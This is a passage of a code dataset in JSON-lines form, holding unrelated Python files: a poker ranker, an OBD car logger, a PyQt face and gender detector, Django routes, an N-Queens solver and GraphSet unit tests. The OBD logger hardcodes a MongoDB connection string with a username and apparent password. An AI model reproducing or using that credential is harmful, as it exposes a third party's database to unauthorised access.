\n \nGiven a list `hand` containing five strings being the cards, implement a\nfunction that returns a string with the name of the highest combination\nobtained, accordingly to the table above.\n\n### Examples\n\n poker_hand_ranking([\"10h\", \"Jh\", \"Qh\", \"Ah\", \"Kh\"]) ➞ \"Royal Flush\"\n \n poker_hand_ranking([\"3h\", \"5h\", \"Qs\", \"9h\", \"Ad\"]) ➞ \"High Card\"\n \n poker_hand_ranking([\"10s\", \"10c\", \"8d\", \"10d\", \"10h\"]) ➞ \"Four of a Kind\"\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef poker_hand_ranking(hand):\n lookup = {\"2\":2, \"3\":3, \"4\":4, \"5\":5, \"6\":6, \"7\":7, \"8\":8, \"9\":9, \"1\":10, \"J\":11, \"Q\":12, \"K\":13, \"A\":14}\n values = []\n suits = []\n for x in range(len(hand)):\n values.append(lookup.get(hand[x][0]))\n suits.append(hand[x][len(hand[x]) - 1])\n values.sort()\n \n #royal/straight/flush\n if suits.count(suits[0]) == len(suits):\n if values == list(range(min(values), max(values) + 1)):\n if values == list(range(10, 15)):\n return \"Royal Flush\"\n return \"Straight Flush\"\n return \"Flush\"\n \n #four of a kind\n if values.count(values[0]) == 4 or values.count(values[1]) == 4:\n return \"Four of a Kind\"\n \n #full house/three of a kind\n if values.count(values[1]) == 3:\n if values.count(values[len(values) - 1]) == 2:\n return \"Full House\"\n return \"Three of a Kind\"\n if values.count(values[len(values) - 1]) == 3:\n if values.count(values[1]) == 2:\n return \"Full House\"\n return \"Three of a Kind\"\n \n #straight\n if values == list(range(min(values), max(values) + 1)):\n return \"Straight\"\n \n #two pair\n if values.count(values[1]) == 2:\n if values.count(values[3]) == 2:\n return \"Two Pair\"\n return \"Pair\"\n if values.count(values[3]) == 2:\n if values.count(values[1]) == 2:\n return \"Two Pair\"\n return \"Pair\"\n \n return \"High Card\"\n\n","sub_path":"C6pHyc4iN6BNzmhsM_22.py","file_name":"C6pHyc4iN6BNzmhsM_22.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"614451082","text":"import RPi.GPIO as GPIO\nimport obd\nfrom obd import OBDStatus\nimport datetime\n\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(18,GPIO.OUT)\n\nwhile (OBDStatus.CAR_CONNECTED):\n # successful communication with the ELM327 and the vehicle\n\n connection = obd.OBD() # auto-connects to USB or RF port\n \n spd = obd.commands.SPEED\n rpm = obd.commands.RPM # select an OBD command (sensor)\n tps = obd.commands.THROTTLE_POS\n maf = obd.commands.MAF\n engload = obd.commands.ENGINE_LOAD \n \n speed = connection.query(spd)\n revolution = connection.query(rpm) # send the command, and parse the response\n throttle_pos = connection.query(tps)\n massflow = connection.query(maf)\n engine_load = connection.query(engload)\n\n print(speed.value)\n print(revolution.value.magnitude) # returns unit-bearing values thanks to Pint\n print(throttle_pos.value)\n print(massflow.value)\n print(engine_load.value)\n \n if speed.value.magnitude <= 1:\n GPIO.output(18,GPIO.HIGH)\n elif speed.value.magnitude >= 2:\n GPIO.output(18,GPIO.LOW)\n else:\n GPIO.output(18,GPIO.LOW)\n\n from pymongo import MongoClient\n # pprint library is used to make the output look more pretty\n from pprint import pprint\n # connect to MongoDB, change the << MONGODB URL >> to reflect your own connection string\n\n client = 
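# poker_hand_ranking above classifies hands by probing values.count(...) at fixed indices, which
# is why the pair / full-house branches appear twice for different positions. A common tightening
# (a sketch of an alternative, not a rewrite of the whole function) is to sort the multiset of
# rank counts once with collections.Counter and branch on that single shape:
from collections import Counter

def rank_shape(values):
    """values: list of five numeric ranks -> sorted count multiset, e.g. [2, 3] = full house."""
    return sorted(Counter(values).values())

assert rank_shape([10, 10, 8, 10, 10]) == [1, 4]      # Four of a Kind
assert rank_shape([5, 5, 9, 9, 9]) == [2, 3]          # Full House
assert rank_shape([2, 2, 7, 7, 11]) == [1, 2, 2]      # Two Pair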
MongoClient('mongodb://gareth:1utmHy2HBYCKZWLO@testing-shard-00-00-ic2uk.mongodb.net:27017,testing-shard-00-01-ic2uk.mongodb.net:27017,testing-shard-00-02-ic2uk.mongodb.net:27017/test?ssl=true&replicaSet=testing-shard-0&authSource=admin')\n\n db=client.testdb\n\n from datetime import datetime\n\n result = db.smartcar.insert_one(\n {\n \"Vehicle\": {\n \"Model\": \"Smart\",\n \"Year\": \"2005\",\n \"Type\": \"Roadster\",\n \"Speed\": speed.value.magnitude,\n \"RPM\": revolution.value.magnitude,\n \"TPS\": throttle_pos.value.magnitude,\n \"MAF\": massflow.value.magnitude,\n \"EngineLoad\": engine_load.value.magnitude\n }\n }\n )\n","sub_path":"dev_python/obdmong.py","file_name":"obdmong.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"601586024","text":"# -*- coding: utf-8 -*-\n\nimport os, sys\nimport numpy as np\nfrom scipy import misc\nimport matplotlib.pyplot as plt\n\n\ndef plot_lr(l_img, r_img, l_title=None, r_title=None, suptitle=None):\n\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(10, 4))\n\n axes[0].imshow(l_img)\n axes[0].set_title(l_title)\n\n axes[1].imshow(r_img)\n axes[1].set_title(r_title)\n\n plt.suptitle(suptitle, fontsize=16)\n plt.show()\n\nif __name__ == '__main__':\n img1 = misc.imread('/home/pingjun/Desktop/SegPreds/n0253.png')\n img2 = misc.imread('/home/pingjun/Desktop/SegPreds/n0265.png')\n plot_lr(img1, img2, l_title=\"Left\", r_title=\"Right\", suptitle=\"Two Images\")\n","sub_path":"pydaily/plots/subplot.py","file_name":"subplot.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"199721238","text":"from PyQt5.QtWidgets import QPushButton, QVBoxLayout, QWidget, QApplication\nfrom PyQt5.QtGui import QIcon, QPixmap\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nimport ChineseText\nimport sys\nfrom time import sleep\nimport os\n\n\nclass WindowClass(QWidget):\n def __init__(self, parent=None):\n super(WindowClass, self).__init__(parent)\n self.cap = cv2.VideoCapture(0)\n self.ret = None\n self.img = None\n self.number = 1\n self.classifier = cv2.CascadeClassifier(\n \"D:\\Files\\PythonFile\\pyQt5Demo\\data\\haarcascades\\haarcascade_frontalface_default.xml\")\n\n self.btn_1 = QPushButton(\"开始\")\n self.btn_3 = QPushButton(\"捕捉\")\n self.btn_4 = QPushButton(\"退出\")\n self.btn_2=QPushButton(\"特效\")\n\n # self.btn_1.setCheckable(True) # 设置已经被点击\n # self.btn_1.toggle() # 切换按钮状态\n self.btn_1.clicked.connect(lambda: self.wichBtn(self.btn_1))\n\n # self.btn_2.setDefault(True)\n self.btn_2.clicked.connect(lambda: self.wichBtn(self.btn_2))\n\n # self.btn_3.setDefault(True) # 设置该按钮式默认状态的\n self.btn_3.clicked.connect(lambda: self.wichBtn(self.btn_3))\n\n self.btn_4.clicked.connect(lambda: self.wichBtn(self.btn_4))\n\n self.resize(400, 300)\n layout = QVBoxLayout()\n layout.addWidget(self.btn_1)\n layout.addWidget(self.btn_2)\n layout.addWidget(self.btn_3)\n layout.addWidget(self.btn_4)\n # layout.addWidget(self.btn_2)\n\n self.setLayout(layout)\n\n def btnState(self):\n\n # OpenCV人脸识别分类器\n # cap=cv2.VideoCapture(0)\n while(1):\n self.ret, self.img = self.cap.read()\n gray = cv2.cvtColor(self.img, cv2.COLOR_RGB2GRAY)\n gender_classifier = load_model(\n \"D:\\Files\\PythonFile\\pyQt5Demo\\\\faceai-master\\\\faceai\\classifier\\gender_models\\simple_CNN.81-0.96.hdf5\")\n gender_labels = {0: '女', 1: '男'}\n # classifier = cv2.CascadeClassifier(\n # 
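# obdmong.py above loops on `while (OBDStatus.CAR_CONNECTED):`. In python-OBD that name is a
# constant (a truthy string), so the condition is always true and a brand-new obd.OBD()
# connection is opened on every pass. A sketch of the presumably intended shape -- connect once,
# then poll for as long as the connection still reports CAR_CONNECTED:
import obd
from obd import OBDStatus

connection = obd.OBD()                                  # auto-connect once, outside the loop
while connection.status() == OBDStatus.CAR_CONNECTED:
    speed = connection.query(obd.commands.SPEED)
    revolution = connection.query(obd.commands.RPM)
    # ... GPIO switching and the MongoDB insert from the record would follow here ...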
\"D:\\\\Files\\PythonFile\\\\pyQt5Demo\\\\data\\haarcascades\\\\haarcascade_frontalface_default.xml\"\n # )\n color = (0, 100, 0) # 定义绘制颜色\n # 调用识别人脸\n faceRects = self.classifier.detectMultiScale(\n gray, scaleFactor=1.2, minNeighbors=3, minSize=(32, 32))\n if len(faceRects): # 大于0则检测到人脸\n for faceRect in faceRects: # 单独框出每一张人脸\n x, y, w, h = faceRect\n face = self.img[(y - 60):(y + h + 60), (x - 30):(x + w + 30)]\n face = cv2.resize(face, (48, 48))\n face = np.expand_dims(face, 0)\n face = face / 255.0 \n gender_label_arg = np.argmax(gender_classifier.predict(face))\n gender = gender_labels[gender_label_arg]\n cv2.rectangle(self.img, (x, y), (x + h, y + w), color, 2)\n self.img = ChineseText.cv2ImgAddText(self.img, gender, x + h, y, color, 30)\n # 框出人脸\n cv2.rectangle(self.img, (x, y), (x + h, y + w), color, 1)\n # 左眼\n cv2.circle(self.img, (x + w // 4, y + h // 4 + 30), min(w // 8, h // 8),\n color, 1)\n # 右眼\n cv2.circle(self.img, (x + 3 * w // 4, y + h // 4 + 30), min(w // 8, h // 8),\n color, 1)\n # 嘴巴\n cv2.rectangle(self.img, (x + 3 * w // 8, y + 3 * h // 4),\n (x + 5 * w // 8, y + 7 * h // 8), color, 1)\n\n cv2.namedWindow(\"enhanced\", flags=0)\n cv2.resizeWindow(\"enhanced\", 1000, 960)\n cv2.imshow(\"enhanced\", self.img) # 显示图像\n c = cv2.waitKey(10)\n def btnState2(self):\n while(1):\n imgCompose = cv2.imread(\"D:\\Files\\PythonFile\\\\figures\\maozi.png\")\n # cap = cv2.VideoCapture(0)\n ret,img=self.cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # 转换灰色\n color = (0, 255, 0) # 定义绘制颜色\n # 调用识别人脸\n faceRects = self.classifier.detectMultiScale(\n gray, scaleFactor=1.2, minNeighbors=3, minSize=(32, 32))\n if len(faceRects): # 大于0则检测到人脸\n for faceRect in faceRects: \n x, y, w, h = faceRect\n sp = imgCompose.shape\n imgComposeSizeH = int(sp[0]/sp[1]*w)\n if imgComposeSizeH>(y-20):\n imgComposeSizeH=(y-20)\n imgComposeSize = cv2.resize(imgCompose,(w, imgComposeSizeH), interpolation=cv2.INTER_NEAREST)\n top = (y-imgComposeSizeH-20)\n if top<=0:\n top=0\n rows, cols, channels = imgComposeSize.shape\n roi = img[top:top+rows,x:x+cols]\n\n # Now create a mask of logo and create its inverse mask also\n img2gray = cv2.cvtColor(imgComposeSize, cv2.COLOR_RGB2GRAY)\n ret, mask = cv2.threshold(img2gray, 10, 255, cv2.THRESH_BINARY) \n mask_inv = cv2.bitwise_not(mask)\n\n # Now black-out the area of logo in ROI\n img1_bg = cv2.bitwise_and(roi, roi, mask=mask_inv)\n\n # Take only region of logo from logo image.\n img2_fg = cv2.bitwise_and(imgComposeSize, imgComposeSize, mask=mask)\n\n # Put logo in ROI and modify the main image\n dst = cv2.add(img1_bg, img2_fg)\n img[top:top+rows, x:x+cols] = dst\n cv2.namedWindow(\"enhanced\", flags=0)\n cv2.resizeWindow(\"enhanced\", 1000, 960)\n cv2.imshow(\"enhanced\", img) # 显示图像\n c = cv2.waitKey(10)\n def wichBtn(self, btn):\n if btn == self.btn_1:\n self.btnState()\n elif btn == self.btn_4:\n self.cap.release()\n self.close()\n elif btn==self.btn_2:\n self.btnState2()\n else:\n imgpath = \"D:\\Files\\PythonFile\\\\figures\" \"\\\\\" + \\\n str(self.number) + \".jpg\"\n cv2.imwrite(imgpath, self.img)\n self.number = self.number+1\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = WindowClass()\n win.show()\n sys.exit(app.exec_())\n","sub_path":"pyQt5Demo/pyQtDemo.py","file_name":"pyQtDemo.py","file_ext":"py","file_size_in_byte":6620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"77501810","text":"\n\nfrom xai.brain.wordbase.nouns._varnish import _VARNISH\n\n#calss 
header\nclass _VARNISHES(_VARNISH, ):\n\tdef __init__(self,): \n\t\t_VARNISH.__init__(self)\n\t\tself.name = \"VARNISHES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"varnish\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_varnishes.py","file_name":"_varnishes.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"274121649","text":"from io import BytesIO\r\n\r\nfrom aiohttp.web import Response as send_file\r\nfrom wand import image\r\n\r\nfrom utils import http\r\nfrom utils.endpoint import Endpoint\r\n\r\n\r\nclass Magik(Endpoint):\r\n async def generate(self, request, avatars, text, usernames):\r\n avatar = await http.get_image(request, avatars[0])\r\n with image.Image(file=avatar) as img:\r\n img.transform(resize='400x400')\r\n img.liquid_rescale(width=int(img.width * 0.5),\r\n height=int(img.height * 0.5),\r\n delta_x=0.5,\r\n rigidity=0)\r\n img.liquid_rescale(width=int(img.width * 1.5),\r\n height=int(img.height * 1.5),\r\n delta_x=2,\r\n rigidity=0)\r\n\r\n b = BytesIO()\r\n img.save(file=b)\r\n b.seek(0)\r\n return send_file(body=b, content_type='image/png')\r\n\r\n\r\ndef setup():\r\n return Magik()\r\n","sub_path":"endpoints/magik.py","file_name":"magik.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"61996331","text":"from django.urls import path\n\nfrom .views import index, room, chatroomlist, createroom, current_user, UserList, AddRoom, RemoveRoom\n\nurlpatterns = [\n path('', index, name='index'),\n path('current_user/', current_user),\n path('users/', UserList.as_view()),\n path('/', room, name='room'),\n path('chatroomlist//', chatroomlist, name='chatroomlist'),\n path('removeroom//', RemoveRoom, name=\"removeroom\"),\n path('createroom//', AddRoom, name='addroom')\n]\n","sub_path":"capstone/chat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"537719481","text":"# 51. N-Queens # The n-queens puzzle is the problem of placing n queens on an n×n chessboard such that no two queens attack each other.\n\n# Given an integer n, return all distinct solutions to the n-queens puzzle.\n\n# Each solution contains a distinct board configuration of the n-queens' placement,\n# where 'Q' and '.' 
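# The Magik endpoint above is the usual content-aware-distortion trick: seam-carve the avatar
# down to 50% and back up to 150% with Wand's liquid_rescale (which requires ImageMagick built
# with liblqr). The core transform with the aiohttp plumbing stripped out; file names here are
# placeholders:
from wand import image

with image.Image(filename='avatar.png') as img:
    img.transform(resize='400x400')
    img.liquid_rescale(width=int(img.width * 0.5), height=int(img.height * 0.5),
                       delta_x=0.5, rigidity=0)
    img.liquid_rescale(width=int(img.width * 1.5), height=int(img.height * 1.5),
                       delta_x=2, rigidity=0)
    img.save(filename='magik.png')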
both indicate a queen and an empty space respectively.\n\n# Example:\n\n# Input: 4\n# Output: [\n# [\".Q..\", // Solution 1\n# \"...Q\",\n# \"Q...\",\n# \"..Q.\"],\n\n# [\"..Q.\", // Solution 2\n# \"Q...\",\n# \"...Q\",\n# \".Q..\"]\n# ]\n# Explanation: There exist two distinct solutions to the 4-queens puzzle as shown above.\n\nfrom typing import List\n\n\nclass Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n \"\"\"\n We place queens on the board one row at a time,\n starting with the top row.\n To place the rth queen,\n we methodically try all n squares in row r\n from left to right in a simple for loop.\n If a particular square is attacked by an earlier queen,\n we ignore that square;\n otherwise,\n we tentatively place a queen on that\n square and recursively grope for consistent placements of\n the queens in later rows\n -- Algorithm By Jeff Erickson\n \"\"\"\n results = []\n\n Q = [-1 for _ in range(n)]\n\n def Place_Queens(Q: List[int], r: int):\n if r == len(Q):\n result = []\n # convert result to answer\n for i in Q:\n result.append(\"\".join(\n [\".\" if x != i else \"Q\" for x in range(n)]))\n results.append(result)\n else:\n # The outer for-loop considers all possible placements\n # of a queen on row r;\n for j in range(len(Q)):\n legal = True\n # the inner for-loop checks whether a candidate\n # placement of row r is consistent with\n # the queens that are already on the first r − 1 rows.\n for i in range(r):\n if (\n # check horizontally : if the line above occupy\n # same x,horizontally illegel\n (Q[i] == j) or\n # https: // i.loli.net/2019/09/03/qvfk2x4RQltwy8d.png\n # diagonally right\n (Q[i] == j + (r-i)) or\n # diagonally left\n (Q[i] == j - (r-i))\n ):\n legal = False\n if (legal):\n Q[r] = j\n Place_Queens(Q, r + 1)\n\n Place_Queens(Q, 0)\n\n return results\n\n\nif __name__ == '__main__':\n from util import Test\n s = Solution()\n result = [[\".Q..\", \"...Q\", \"Q...\", \"..Q.\"],\n [\"..Q.\", \"Q...\", \"...Q\", \".Q..\"]]\n t = Test(s.solveNQueens)\n t.equal(result, 4)\n","sub_path":"Python/51.py","file_name":"51.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"358185294","text":"from typing import Any, List, Type\nfrom unittest import TestCase\n\nfrom altimeter.core.graph.exceptions import (\n GraphSetOrphanedReferencesException,\n UnmergableDuplicateResourceIdsFoundException,\n UnmergableGraphSetsException,\n)\nfrom altimeter.core.graph.graph_set import GraphSet\nfrom altimeter.core.graph.link.links import ResourceLinkLink, SimpleLink\nfrom altimeter.core.multilevel_counter import MultilevelCounter\nfrom altimeter.core.resource.resource import Resource\nfrom altimeter.core.resource.resource_spec import ResourceSpec\nfrom altimeter.core.resource.exceptions import ResourceSpecClassNotFoundException\n\n\n\nclass TestResourceSpecA(ResourceSpec):\n type_name = \"a\"\n\n @classmethod\n def get_full_type_name(self):\n return \"test:a\"\n\n @classmethod\n def scan(cls: Type[\"TestResourceSpecA\"], scan_accessor: Any) -> List[Resource]:\n raise NotImplementedError()\n\n\n\nclass TestResourceSpecB(ResourceSpec):\n type_name = \"b\"\n\n @classmethod\n def get_full_type_name(self):\n return \"test:b\"\n\n @classmethod\n def scan(cls: Type[\"TestResourceSpecB\"], scan_accessor: Any) -> List[Resource]:\n raise NotImplementedError()\n\n\nclass TestScanAccessor:\n pass\n\n\nclass TestGraphSetWithValidDataNoMerging(TestCase):\n def setUp(self):\n resource_a1 = 
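# Place_Queens above re-scans every earlier row for each candidate square, making the legality
# test O(r) per placement. The standard constant-time variant tracks occupied columns and both
# diagonal families in sets: r - j is constant along one diagonal and r + j along the other.
# The same backtracking with that bookkeeping, counting solutions instead of building boards:
def count_solutions(n):
    cols, diag1, diag2 = set(), set(), set()

    def place(r):
        if r == n:
            return 1
        total = 0
        for j in range(n):
            if j in cols or (r - j) in diag1 or (r + j) in diag2:
                continue                        # square is attacked, skip it
            cols.add(j); diag1.add(r - j); diag2.add(r + j)
            total += place(r + 1)
            cols.remove(j); diag1.remove(r - j); diag2.remove(r + j)
        return total

    return place(0)

assert count_solutions(4) == 2                  # matches the two boards in the example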
Resource(\n resource_id=\"123\", type_name=\"test:a\", links=[SimpleLink(pred=\"has-foo\", obj=\"goo\")]\n )\n resource_a2 = Resource(resource_id=\"456\", type_name=\"test:a\")\n resource_b1 = Resource(\n resource_id=\"abc\", type_name=\"test:b\", links=[ResourceLinkLink(pred=\"has-a\", obj=\"123\")]\n )\n resource_b2 = Resource(\n resource_id=\"def\", type_name=\"test:b\", links=[SimpleLink(pred=\"name\", obj=\"sue\")]\n )\n resources = [resource_a1, resource_a2, resource_b1, resource_b2]\n self.graph_set = GraphSet(\n name=\"test-name\",\n version=\"1\",\n start_time=1234,\n end_time=4567,\n resources=resources,\n errors=[\"test err 1\", \"test err 2\"],\n stats=MultilevelCounter(),\n )\n\n def test_rdf_a_type(self):\n graph = self.graph_set.to_rdf()\n\n a_results = graph.query(\n \"select ?p ?o where {?s a ; ?p ?o} order by ?p ?o\"\n )\n expected_a_result_tuples = [\n (\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\", \"test-name:test:a\"),\n (\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\", \"test-name:test:a\"),\n (\"test-name:has-foo\", \"goo\"),\n (\"test-name:id\", \"123\"),\n (\"test-name:id\", \"456\"),\n ]\n a_result_tuples = []\n for a_result in a_results:\n self.assertEqual(2, len(a_result))\n a_result_tuples.append((str(a_result[0]), str(a_result[1])))\n self.assertEqual(expected_a_result_tuples, a_result_tuples)\n\n def test_rdf_b_type(self):\n graph = self.graph_set.to_rdf()\n graph.serialize(\"/tmp/test.rdf\")\n linked_a_node_results = graph.query(\n \"select ?s where {?s a ; '123' }\"\n )\n self.assertEqual(len(linked_a_node_results), 1)\n for linked_a_node_result in linked_a_node_results:\n linked_a_node = str(linked_a_node_result[0])\n b_results = graph.query(\n \"select ?p ?o where {?s a ; ?p ?o} order by ?p ?o\"\n )\n expected_b_result_tuples = [\n (\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\", \"test-name:test:b\"),\n (\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\", \"test-name:test:b\"),\n (\"test-name:has-a\", str(linked_a_node)),\n (\"test-name:id\", \"abc\"),\n (\"test-name:id\", \"def\"),\n (\"test-name:name\", \"sue\"),\n ]\n b_result_tuples = []\n for b_result in b_results:\n self.assertEqual(2, len(b_result))\n b_result_tuples.append((str(b_result[0]), str(b_result[1])))\n self.assertEqual(expected_b_result_tuples, b_result_tuples)\n\n def test_rdf_error_graphing(self):\n graph = self.graph_set.to_rdf()\n\n err_results = graph.query(\"select ?o where { ?s ?o } order by ?o\")\n err_strs = []\n expected_err_strs = [\"test err 1\", \"test err 2\"]\n for err_result in err_results:\n self.assertEqual(1, len(err_result))\n err_strs.append(str(err_result[0]))\n self.assertEqual(err_strs, expected_err_strs)\n\n def test_to_dict(self):\n expected_dict = {\n \"name\": \"test-name\",\n \"version\": \"1\",\n \"start_time\": 1234,\n \"end_time\": 4567,\n \"resources\": {\n \"123\": {\n \"type\": \"test:a\",\n \"links\": [{\"pred\": \"has-foo\", \"obj\": \"goo\", \"type\": \"simple\"}],\n },\n \"456\": {\"type\": \"test:a\"},\n \"abc\": {\n \"type\": \"test:b\",\n \"links\": [{\"pred\": \"has-a\", \"obj\": \"123\", \"type\": \"resource_link\"}],\n },\n \"def\": {\n \"type\": \"test:b\",\n \"links\": [{\"pred\": \"name\", \"obj\": \"sue\", \"type\": \"simple\"}],\n },\n },\n \"errors\": [\"test err 1\", \"test err 2\"],\n \"stats\": {\"count\": 0},\n }\n self.assertDictEqual(expected_dict, self.graph_set.to_dict())\n\n def test_from_dict(self):\n input_dict = {\n \"name\": \"test-name\",\n \"version\": \"1\",\n \"start_time\": 1234,\n \"end_time\": 
4567,\n \"resources\": {\n \"123\": {\n \"type\": \"test:a\",\n \"links\": [{\"pred\": \"has-foo\", \"obj\": \"goo\", \"type\": \"simple\"}],\n },\n \"456\": {\"type\": \"test:a\"},\n \"abc\": {\n \"type\": \"test:b\",\n \"links\": [{\"pred\": \"has-a\", \"obj\": \"123\", \"type\": \"resource_link\"}],\n },\n \"def\": {\n \"type\": \"test:b\",\n \"links\": [{\"pred\": \"name\", \"obj\": \"sue\", \"type\": \"simple\"}],\n },\n },\n \"errors\": [\"test err 1\", \"test err 2\"],\n \"stats\": {\"count\": 0},\n }\n graph_set = GraphSet.from_dict(input_dict)\n self.assertEqual(graph_set.to_dict(), input_dict)\n\n def test_validate(self):\n self.graph_set.validate()\n\n\nclass TestGraphSetWithValidDataMerging(TestCase):\n def setUp(self):\n resource_a1 = Resource(\n resource_id=\"123\", type_name=\"test:a\", links=[SimpleLink(pred=\"has-foo\", obj=\"goo\")]\n )\n resource_a2 = Resource(\n resource_id=\"123\", type_name=\"test:a\", links=[SimpleLink(pred=\"has-goo\", obj=\"foo\")]\n )\n resource_b1 = Resource(\n resource_id=\"abc\", type_name=\"test:b\", links=[ResourceLinkLink(pred=\"has-a\", obj=\"123\")]\n )\n resource_b2 = Resource(\n resource_id=\"def\", type_name=\"test:b\", links=[SimpleLink(pred=\"name\", obj=\"sue\")]\n )\n resources = [resource_a1, resource_a2, resource_b1, resource_b2]\n self.graph_set = GraphSet(\n name=\"test-name\",\n version=\"1\",\n start_time=1234,\n end_time=4567,\n resources=resources,\n errors=[\"test err 1\", \"test err 2\"],\n stats=MultilevelCounter(),\n )\n\n def test_rdf_a_type(self):\n graph = self.graph_set.to_rdf()\n\n a_results = graph.query(\n \"select ?p ?o where {?s a ; ?p ?o} order by ?p ?o\"\n )\n expected_a_result_tuples = [\n (\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\", \"test-name:test:a\"),\n (\"test-name:has-foo\", \"goo\"),\n (\"test-name:has-goo\", \"foo\"),\n (\"test-name:id\", \"123\"),\n ]\n a_result_tuples = []\n for a_result in a_results:\n self.assertEqual(2, len(a_result))\n a_result_tuples.append((str(a_result[0]), str(a_result[1])))\n self.assertEqual(expected_a_result_tuples, a_result_tuples)\n\n def test_validate(self):\n self.graph_set.validate()\n\n\nclass TestGraphSetWithInValidData(TestCase):\n def test_unknown_type_name(self):\n resources = [\n Resource(resource_id=\"xyz\", type_name=\"test:a\"),\n Resource(resource_id=\"xyz\", type_name=\"test:c\"),\n ]\n with self.assertRaises(ResourceSpecClassNotFoundException):\n GraphSet(\n name=\"test-name\",\n version=\"1\",\n start_time=1234,\n end_time=4567,\n resources=resources,\n errors=[],\n stats=MultilevelCounter(),\n )\n\n def test_invalid_resources_dupes_same_class_conflicting_types_no_allow_clobber(self):\n resources = [\n Resource(resource_id=\"123\", type_name=\"test:a\"),\n Resource(resource_id=\"123\", type_name=\"test:b\"),\n ]\n with self.assertRaises(UnmergableDuplicateResourceIdsFoundException):\n GraphSet(\n name=\"test-name\",\n version=\"1\",\n start_time=1234,\n end_time=4567,\n resources=resources,\n errors=[],\n stats=MultilevelCounter(),\n )\n\n def test_orphaned_ref(self):\n resource_a1 = Resource(\n resource_id=\"123\", type_name=\"test:a\", links=[SimpleLink(pred=\"has-foo\", obj=\"goo\")]\n )\n resource_b1 = Resource(\n resource_id=\"abc\", type_name=\"test:b\", links=[ResourceLinkLink(pred=\"has-a\", obj=\"456\")]\n )\n resources = [resource_a1, resource_b1]\n graph_set = GraphSet(\n name=\"test-name\",\n version=\"1\",\n start_time=1234,\n end_time=4567,\n resources=resources,\n errors=[\"test err 1\", \"test err 2\"],\n 
stats=MultilevelCounter(),\n )\n with self.assertRaises(GraphSetOrphanedReferencesException):\n graph_set.validate()\n\n\nclass TestGraphSetMerge(TestCase):\n def test_invalid_diff_names(self):\n graph_set_1 = GraphSet(\n name=\"graph-1\",\n version=\"1\",\n start_time=10,\n end_time=20,\n resources=[],\n errors=[],\n stats=MultilevelCounter(),\n )\n graph_set_2 = GraphSet(\n name=\"graph-2\",\n version=\"1\",\n start_time=15,\n end_time=25,\n resources=[],\n errors=[],\n stats=MultilevelCounter(),\n )\n with self.assertRaises(UnmergableGraphSetsException):\n graph_set_1.merge(graph_set_2)\n\n def test_invalid_diff_versions(self):\n graph_set_1 = GraphSet(\n name=\"graph-1\",\n version=\"1\",\n start_time=10,\n end_time=20,\n resources=[],\n errors=[],\n stats=MultilevelCounter(),\n )\n graph_set_2 = GraphSet(\n name=\"graph-1\",\n version=\"2\",\n start_time=15,\n end_time=25,\n resources=[],\n errors=[],\n stats=MultilevelCounter(),\n )\n with self.assertRaises(UnmergableGraphSetsException):\n graph_set_1.merge(graph_set_2)\n\n def test_valid_merge(self):\n resource_a1 = Resource(\n resource_id=\"123\", type_name=\"test:a\", links=[SimpleLink(pred=\"has-foo\", obj=\"goo\")]\n )\n resource_a2 = Resource(resource_id=\"456\", type_name=\"test:a\")\n resource_b1 = Resource(\n resource_id=\"abc\", type_name=\"test:b\", links=[ResourceLinkLink(pred=\"has-a\", obj=\"123\")]\n )\n resource_b2 = Resource(\n resource_id=\"def\", type_name=\"test:b\", links=[SimpleLink(pred=\"name\", obj=\"sue\")]\n )\n graph_set_1 = GraphSet(\n name=\"graph-1\",\n version=\"1\",\n start_time=10,\n end_time=20,\n resources=[resource_a1, resource_a2],\n errors=[\"errora1\", \"errora2\"],\n stats=MultilevelCounter(),\n )\n graph_set_2 = GraphSet(\n name=\"graph-1\",\n version=\"1\",\n start_time=15,\n end_time=25,\n resources=[resource_b1, resource_b2],\n errors=[\"errorb1\", \"errorb2\"],\n stats=MultilevelCounter(),\n )\n graph_set_1.merge(graph_set_2)\n\n self.assertEqual(graph_set_1.name, \"graph-1\")\n self.assertEqual(graph_set_1.version, \"1\")\n self.assertEqual(graph_set_1.start_time, 10)\n self.assertEqual(graph_set_1.end_time, 25)\n self.assertCountEqual(graph_set_1.errors, [\"errora1\", \"errora2\", \"errorb1\", \"errorb2\"])\n expected_resource_dicts = [\n {\"type\": \"test:a\", \"links\": [{\"pred\": \"has-foo\", \"obj\": \"goo\", \"type\": \"simple\"}]},\n {\"type\": \"test:a\"},\n {\"type\": \"test:b\", \"links\": [{\"pred\": \"has-a\", \"obj\": \"123\", \"type\": \"resource_link\"}]},\n {\"type\": \"test:b\", \"links\": [{\"pred\": \"name\", \"obj\": \"sue\", \"type\": \"simple\"}]},\n ]\n resource_dicts = [resource.to_dict() for resource in graph_set_1.resources]\n self.assertCountEqual(expected_resource_dicts, 